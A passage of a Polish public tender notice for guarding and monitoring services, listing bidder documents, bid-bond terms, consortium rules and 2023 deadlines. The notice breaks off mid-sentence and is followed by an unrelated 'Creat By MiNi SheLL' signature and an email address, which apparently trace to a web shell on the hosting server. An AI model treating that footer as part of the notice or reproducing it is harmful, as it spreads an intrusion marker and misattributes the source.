Wykonawców wspólnie ubiegających się o zamówienie, dokument powinien być złożony osobno za każdego ze wspólników oraz za np. spółkę cywilną/konsorcjum.<br/>3)	Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp (Rozdział XI pkt 4 ppkt 1 SWZ), wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności - w przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument powinien być złożony osobno za każdego ze wspólników oraz za np. spółkę cywilną/konsorcjum.<br/>4)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4.<br/>–	Co do zasady Wykonawca zagraniczny powinien złożyć odpowiedniki polskiej informacji z Krajowego Rejestru Karnego, zaświadczeń o niezaleganiu w opłacaniu podatków, składek <br/>na ubezpieczenie społeczne lub zdrowotne, odpisu z KRS lub CEiDG. <br/>Zamawiający pobierze samodzielnie powyższe informacje ze strony internetowej: https://ekrs.ms.gov.pl lub https://prod.ceidg.gov.pl<br/>5)	Oświadczenie o przynależności bądź braku przynależności do tej samej grupy kapitałowej z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu - składane będzie, co do zasady tylko przez Wykonawcę, który złożył najwyżej ocenioną ofertę, a nie przez wszystkich Wykonawców ubiegających się o udzielenie zamówienia – w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp zgodnie ze wzorem stanowiącym <br/>Załącznik nr 11 do SWZ.<br/>6)	Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – według wzoru stanowiącego Załącznik nr 12 do SWZ, o których mowa w.<br/>a)	art.108 ust. 1 ustawy Pzp,<br/>b)	art. 109 ust.1 pkt 1, 4, 7, 8 i 10 ustawy Pzp,<br/>c)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Aktualna koncesja wydana przez Ministra Spraw Wewnętrznych i Administracji określająca formę <br/>i zakres usług ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób <br/>i mienia – w zakresie spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, określonej <br/>w Rozdziale XII pkt 1 ppkt 2 SWZ.<br/>2)	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/>nie mniejszą niż 600 000,00 zł – w zakresie spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej określonej w Rozdziale XII pkt 1 ppkt 3 SWZ.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganego przez Zamawiającego podmiotowego środka dowodowego, o którym mowa powyżej, Wykonawca składa inny podmiotowy środek dowodowy.<br/>3)	Wykazy:<br/>a)	Wykaz usług wykonanych lub wykonywanych przez Wykonawcę w okresie ostatnich 3 lat* przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem rodzaju (przedmiotu), wartości, daty, miejsca wykonana i podmiotu na rzecz którego usługi zostały wykonane lub są wykonywane (co najmniej 2 dwie) usługi o tym samym rodzaju co przedmiot zamówienia i o wartości co najmniej 200 000,00 zł brutto) wraz z załączeniem dowodu określającego, że wskazana usługa została wykonana lub jest wykonywana należycie (okres wykonywania każdej z usług nie może być krótszy niż 12 miesięcy) – w zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, określonego w Rozdziale XII pkt 1 ppkt 4 – Wykaz usług wykonanych <br/>lub wykonywanych przez Wykonawcę sporządzony wg wzoru stanowiącego Załącznik nr 8 do SWZ.<br/>* okres ten liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Dowodami, o których mowa powyżej, potwierdzającymi czy usługi wskazane w wykazie zostały wykonane należycie są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane;<br/>- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn niezależnych od Wykonawcy nie jest on w stanie uzyskać dokumentów, o których mowa w tiret pierwszym;<br/>- w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumentów dotyczących przynajmniej jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, w którym Wykonawca wykazuje spełnienie warunków udziału w postępowaniu. <br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie <br/>z innymi Wykonawcami w „Wykazie usług wykonanych lub wykonywanych” może wykazać tylko <br/>te usługi, w których bezpośrednio uczestniczył, a w przypadku usług powtarzających się lub ciągłych, w których bezpośrednio uczestniczył lub uczestniczy.<br/>b)	Wykaz osób – zgodnie z wymaganiami Zamawiającego opisanymi w Rozdziale XII pkt 1 ppkt 4 lit. b), według wzoru stanowiącego Załącznik nr 9 do SWZ,<br/>c)	Wykaz potencjału technicznego Wykonawcy - wraz z informacją do dysponowania tymi zasobami, zgodnie z wymaganiami Zamawiającego opisanymi w Rozdziale XII pkt 1 ppkt 4 lit. c), według wzoru stanowiącego Załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia wymienione powyżej muszą być złożone w następujący sposób:<br/>Wykonawca - składa oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym,<br/>Wykonawca/każdy spośród Wykonawców wspólnie ubiegający się o udzielenie zamówienia - sporządza oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W tym przypadku każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie w jakim każdy z nich wykazuje spełnianie warunków udziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z ofertą dodatkowo: Oświadczenie Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia według wzoru określonego w Załączniku nr 6 do SWZ,<br/>Podmiot trzeci, na którego potencjał powołuje się Wykonawca (jeśli dotyczy) - sporządza oświadczenia we własnym imieniu w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W tym przypadku oświadczenia potwierdzają brak podstaw do wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się na jego zasoby.<br/>Zobowiązanie podmiotu/ów oddającego/ych do dyspozycji Wykonawcy niezbędne zasoby w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu (jeśli Wykonawca się powołuje) według wzoru określonego w Załączniku nr 7 do SWZ.<br/>Pełnomocnictwo/-wa - w przypadku, gdy ofertę podpisuje(ą) osoba(y) inna(e) niż wymieniona(e) w odpisie z właściwego Rejestru lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym dokumencie wskazującym sposób reprezentacji Wykonawcy.<br/>Pełnomocnictwo wystawione w oryginale jako dokument elektroniczny przez upoważnione podmioty (inne niż Wykonawca) - Wykonawca zobowiązany jest przekazać Zamawiającemu ten dokument. <br/>W przypadku, gdy pełnomocnictwo wystawione zostało przez upoważnione podmioty jako dokument w postaci papierowej, opatrzone własnoręcznym podpisem, Wykonawca przekazuje Zamawiającemu cyfrowe odwzorowanie tego dokumentu opatrzone przez mocodawcę kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, poświadczając zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <br/>Potwierdzenia zgodności odwzorowania cyfrowego własnym podpisem kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym zawsze może dokonać notariusz stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie.<br/>Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>Załączone pełnomocnictwo powinno zawierać co najmniej informację o tym:<br/>- kto go udziela,<br/>- wskazanie osoby będącej pełnomocnikiem,<br/>- zakres umocowania pełnomocnika.<br/>Jeżeli dalsze pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego będzie udzielone przez pełnomocnika Wykonawcy, należy załączyć (forma jak wyżej) również dalsze pełnomocnictwo.<br/>Dokument potwierdzający – jeżeli wadium jest wnoszone w innych formach niż w pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium celem zabezpieczenia swojej oferty:<br/>–	w wysokości 10 000,00 zł (słownie zł: Dziesięć tysięcy 00/100)<br/>2. Wadium należy wnieść przed upływem terminu składania ofert, który upływa dnia <br/>7 września 2023 roku o godz. 11:00 i utrzymać nieprzerwanie do dnia upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3.	Wadium musi obejmować pełen okres związania ofertą.<br/>4.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/>5.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach, opisanych w Rozdziale XVIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku: <br/>1)	dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający stawia następujące wymagania: <br/>a)	warunek, o którym mowa w Rozdziale XI pkt 1 SWZ powinien spełniać każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>b)	warunek, o którym mowa w Rozdziale XII pkt 1 ppkt 2 zostanie spełniony jeżeli przynajmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia, tj. koncesję MSWiA na prowadzoną działalność gospodarczą i zrealizuje usługę bezpośredniej (stałej) ochrony fizycznej osób i mienia oraz monitoringu w obiekcie/siedzibie Zamawiającego;<br/>c)	warunek, o którym mowa w Rozdziale XII pkt 1 ppkt 3 (warunek nie podlega sumowaniu) i ppkt 4 zostanie spełniony jeżeli przynajmniej jeden z Wykonawców spełni wymagania Zamawiającego i będzie wykonywał usługi, do których realizacji zdolności są wymagane;<br/>2)	Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia;<br/>2.	Oferta musi być podpisana w taki sposób, aby wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego;<br/>3.	Pełnomocnictwo powinno być złożone w sposób i w formie określonej w Rozdziale XX pkt 12 ppkt 4 SWZ.<br/>4.	W przypadku, gdy oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie uznana przez Zamawiającego za najkorzystniejszą, warunkiem zawarcia umowy z Zamawiającym jest spełnienie następujących wymagań:<br/>- na żądanie Zamawiającego, Wykonawcy przedłożą kopię umowy regulującej zasady ich współpracy,<br/>- umowa (konsorcjum) winna określać: Strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania każdej ze Stron, solidarną odpowiedzialność <br/>za zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia;<br/>5.	Zamawiający informuje o treści przepisu art. 117 ust. 3 ustawy Pzp zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>6.	Zamawiający wymaga złożenia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia określającego, które usługi/zadania będzie wykonywał każdy z nich. Wzór oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia stanowi Załącznik nr 6 do SWZ.<br/>7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak i dla wszystkich partnerów. <br/>8.	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania zamówienia w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9.	Do Wykonawców wspólnie ubiegających się o zamówienie publiczne stosuje się przepisy dotyczące Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ustawy Pzp Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia zmiany w strukturze i organizacji Zamawiającego, jak też zmiany powszechnie obowiązujących przepisów prawa mających wpływ na realizację umowy.<br/>2. Zgodnie z art. 436 pkt 4 lit. b) ustawy Pzp Zamawiający zastrzega możliwość dokonania zmiany zawartej umowy w okresie realizacji zamówienia.<br/>3. Warunki wprowadzenia zmian do umowy oraz waloryzacji wynagrodzenia określone zostały we wzorze umowy stanowiącym Załącznik nr 13 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami za pośrednictwem Systemu, pod adresem: https://ezamowienia.krus.gov.pl/krus_kielce. Wykonawca do upływu terminu składania ofert może wycofać złożoną ofertę, złożyć nową lub zrezygnować z udziału w postępowaniu. Sposób złożenia oferty został opisany w Instrukcji dostępnej pod adresem https://ezamowienia.krus.gov.pl/krus_kielce/elearning</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca może złożyć tylko jedną ofertę.<br/>2. Każdy dokument składający się na ofertę lub złożony wraz z ofertą sporządzony w języku innym niż polski musi być złożony wraz z tłumaczeniem na język polski.<br/>3. Treść oferty musi odpowiadać treści SWZ.<br/>4. Wykonawca ponosi wszelkie koszty związane z uczestnictwem w postępowaniu.<br/>5. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty.<br/>6. Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich.<br/>7. Wykonawca, którego oferta została wybrana, ma obowiązek zawrzeć umowę na warunkach określonych w projektowanych postanowieniach umowy - Załącznik nr 13 do SWZ. <br/>8. Zamawiający zawrze umowę w terminie zgodnym z art. 308 ust. 2 ustawy Pzp.<br/>9. Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez Zamawiającego o miejscu i terminie podpisania umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com